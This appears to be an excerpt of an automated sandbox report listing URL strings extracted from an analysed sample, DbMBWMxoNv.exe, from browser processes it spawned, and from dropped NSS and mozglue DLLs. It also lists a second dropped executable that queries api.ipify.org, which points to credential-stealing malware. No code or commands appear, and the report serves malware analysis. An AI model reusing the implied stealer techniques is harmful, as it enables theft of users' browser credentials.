Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000004.00000002.1630372530.00001B44009AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000004.00000002.1630327314.00001B4400990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000004.00000002.1630327314.00001B4400990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/?
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000004.00000002.1630406237.00001B44009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: DbMBWMxoNv.exe, 00000000.00000002.1930028045.000000007013D000.00000002.00000001.01000000.00000014.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: DbMBWMxoNv.exe, 00000000.00000002.1929230501.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.1549279330.00001B4400078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000003.1459832170.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552832363.00001B44004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552328498.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1462554456.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461371735.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463785182.00001B44003F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.1549162636.00001B440001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603825782.00001B440081C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.1549392273.00001B44000A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.1549392273.00001B44000A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.1549392273.00001B44000A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.1549279330.00001B4400078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000004.00000002.1552832363.00001B44004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comD
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574l
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320R
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604S
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899N
Source: RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr	String found in binary or memory: https://api.ipify.orgSSOFTWARE
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp, chromecache_462.7.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000004.00000002.1631218951.00001B4400A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes
Source: msedge.exe, 00000008.00000002.1599064067.0000020881B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: DbMBWMxoNv.exe, 00000000.00000003.1694663642.0000000023430000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695408426.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1807674424.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695175900.0000000023430000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1691520187.000000002342F000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695320947.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1802416875.0000000023434000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1925532884.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1691375443.000000002342D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1695648146.0000000023433000.00000004.00000020.00020000.00000000.sdmp, json[1].json.0.dr	String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
